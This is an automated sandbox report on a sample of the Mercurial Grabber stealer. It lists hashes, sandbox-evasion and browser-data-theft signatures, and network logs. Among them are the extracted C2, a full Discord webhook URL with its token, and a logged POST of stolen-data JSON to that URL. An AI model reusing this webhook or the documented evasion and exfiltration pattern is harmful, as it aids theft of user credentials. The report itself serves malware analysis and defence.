Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

dab10ca029...18.exe

windows7-x64

10

dab10ca029...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/04/2024, 17:52 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe

  • Size

    41KB

  • MD5

    dab10ca029ce64c3ad251a14e2bf7ebc

  • SHA1

    c1dc121d4a039bf5d4e52e9d9880f279696aa099

  • SHA256

    b83d45a9b4f6cf2a1b5c6752cb8ea0764f2eedc921cdca376dfbfd03f9794aa9

  • SHA512

    3391fde8b09cb64b09214779d3cfe2cbc24f03806f45e4982967fb98560e25a7f0452f4c4de277c22c15847e97087a2f4e9f2795f602692077b4b27caab65f98

  • SSDEEP

    768:OscG4ApfT6aSXpDXswouZkenWTj6KZKfgm3EhdF:9cKfnSXcenWTmF7E7F

Score
10/10
mercurialgrabberevasionspywarestealer

Malware Config

Extracted

Family

mercurialgrabber

C2

https://discord.com/api/webhooks/885486535112278036/BRBTU4jW0bXhm99GuJgoVJFldS1nYh0T52UFO926r9sr0koC56EjNkZxoXg2bCOmdY7y

Signatures

  • Mercurial Grabber Stealer

    Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.

    stealermercurialgrabber
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Checks SCSI registry key(s) 3 TTPs 1 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    evasionspywaretrojan
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe"
    1⤵
    • Looks for VirtualBox Guest Additions in registry
    • Looks for VMWare Tools registry key
    • Checks BIOS information in registry
    • Maps connected drives based on registry
    • Checks SCSI registry key(s)
    • Enumerates system info in registry
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    PID:2584

Network

  • flag-us
    DNS
    ip4.seeip.org
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    ip4.seeip.org
    IN A
    Response
    ip4.seeip.org
    IN A
    23.128.64.141
  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    193.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    193.178.17.96.in-addr.arpa
    IN PTR
    Response
    193.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-193deploystaticakamaitechnologiescom
  • flag-us
    DNS
    ip-api.com
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com//json/
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    Remote address:
    208.95.112.1:80
    Request
    GET //json/ HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Fri, 05 Apr 2024 17:52:52 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 297
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • flag-us
    DNS
    discord.com
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    discord.com
    IN A
    Response
    discord.com
    IN A
    162.159.135.232
    discord.com
    IN A
    162.159.137.232
    discord.com
    IN A
    162.159.138.232
    discord.com
    IN A
    162.159.128.233
    discord.com
    IN A
    162.159.136.232
  • flag-us
    POST
    https://discord.com/api/webhooks/885486535112278036/BRBTU4jW0bXhm99GuJgoVJFldS1nYh0T52UFO926r9sr0koC56EjNkZxoXg2bCOmdY7y
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    Remote address:
    162.159.135.232:443
    Request
    POST /api/webhooks/885486535112278036/BRBTU4jW0bXhm99GuJgoVJFldS1nYh0T52UFO926r9sr0koC56EjNkZxoXg2bCOmdY7y HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 447
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Fri, 05 Apr 2024 17:52:52 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=5349a0dcf37511eea987965b7ae05e8c; Expires=Wed, 04-Apr-2029 17:52:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1712339574
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OyRHcGn4we5FB%2FeCvFU03x6z1WjM1DjixdVsyDKkE9WoZtFv%2BtytrbOz6giIciWKtBu5VMUdKYVLusa256tck3aSHZ37dE98U94mQaGyWOqPFKizVbfVVDVTVB2E"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=5349a0dcf37511eea987965b7ae05e8ce1821afbef86184e0b98eabd23a8b9772bb759ca04a61b2670a47f785933a4c2; Expires=Wed, 04-Apr-2029 17:52:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=22ae3af08e8746faed81dfe470f9bad61b2a49f9-1712339572; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=GtWxH54ozWFThQgc6k5l4AhZ7TEuB.vFVtxjUkKMWNA-1712339572957-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 86fb64fa1da8414c-LHR
  • flag-us
    DNS
    141.64.128.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    141.64.128.23.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    4.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    4.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    1.112.95.208.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.95.208.in-addr.arpa
    IN PTR
    Response
    1.112.95.208.in-addr.arpa
    IN PTR
    ip-apicom
  • flag-us
    DNS
    232.135.159.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.135.159.162.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    50.23.12.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.23.12.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    24.139.73.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    24.139.73.23.in-addr.arpa
    IN PTR
    Response
    24.139.73.23.in-addr.arpa
    IN PTR
    a23-73-139-24deploystaticakamaitechnologiescom
  • flag-us
    DNS
    201.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    201.178.17.96.in-addr.arpa
    IN PTR
    Response
    201.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-201deploystaticakamaitechnologiescom
  • flag-us
    DNS
    19.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    240.221.184.93.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.221.184.93.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.173.189.20.in-addr.arpa
    IN PTR
    Response
  • 23.128.64.141:443
    ip4.seeip.org
    tls
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    728 B
     5.0kB
     10
    9
  • 208.95.112.1:80
    http://ip-api.com//json/
    http
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    296 B
     606 B
     5
    3

    HTTP Request

    GET http://ip-api.com//json/

    HTTP Response

    200
  • 162.159.135.232:443
    https://discord.com/api/webhooks/885486535112278036/BRBTU4jW0bXhm99GuJgoVJFldS1nYh0T52UFO926r9sr0koC56EjNkZxoXg2bCOmdY7y
    tls, http
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    1.4kB
     4.9kB
     9
    10

    HTTP Request

    POST https://discord.com/api/webhooks/885486535112278036/BRBTU4jW0bXhm99GuJgoVJFldS1nYh0T52UFO926r9sr0koC56EjNkZxoXg2bCOmdY7y

    HTTP Response

    404
  • 96.16.110.114:80
    http
    1.3kB
     3
  • 8.8.8.8:53
    ip4.seeip.org
    dns
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    59 B
     75 B
     1
    1

    DNS Request

    ip4.seeip.org

    DNS Response

    23.128.64.141

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    193.178.17.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    193.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    ip-api.com
    dns
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    56 B
     72 B
     1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    discord.com
    dns
    dab10ca029ce64c3ad251a14e2bf7ebc_JaffaCakes118.exe
    57 B
     137 B
     1
    1

    DNS Request

    discord.com

    DNS Response

    162.159.135.232
    162.159.137.232
    162.159.138.232
    162.159.128.233
    162.159.136.232

  • 8.8.8.8:53
    141.64.128.23.in-addr.arpa
    dns
    72 B
     140 B
     1
    1

    DNS Request

    141.64.128.23.in-addr.arpa

  • 8.8.8.8:53
    4.159.190.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    4.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    1.112.95.208.in-addr.arpa
    dns
    71 B
     95 B
     1
    1

    DNS Request

    1.112.95.208.in-addr.arpa

  • 8.8.8.8:53
    232.135.159.162.in-addr.arpa
    dns
    74 B
     136 B
     1
    1

    DNS Request

    232.135.159.162.in-addr.arpa

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    142 B
     157 B
     2
    1

    DNS Request

    198.187.3.20.in-addr.arpa

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    24.139.73.23.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    24.139.73.23.in-addr.arpa

  • 8.8.8.8:53
    201.178.17.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    201.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    19.229.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    19.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    240.221.184.93.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    240.221.184.93.in-addr.arpa

  • 8.8.8.8:53
    18.173.189.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    18.173.189.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2584-0-0x00000000001C0000-0x00000000001D0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2584-1-0x00007FFA28E60000-0x00007FFA29921000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2584-2-0x000000001AD90000-0x000000001ADA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2584-6-0x00007FFA28E60000-0x00007FFA29921000-memory.dmp

    Filesize

    10.8MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.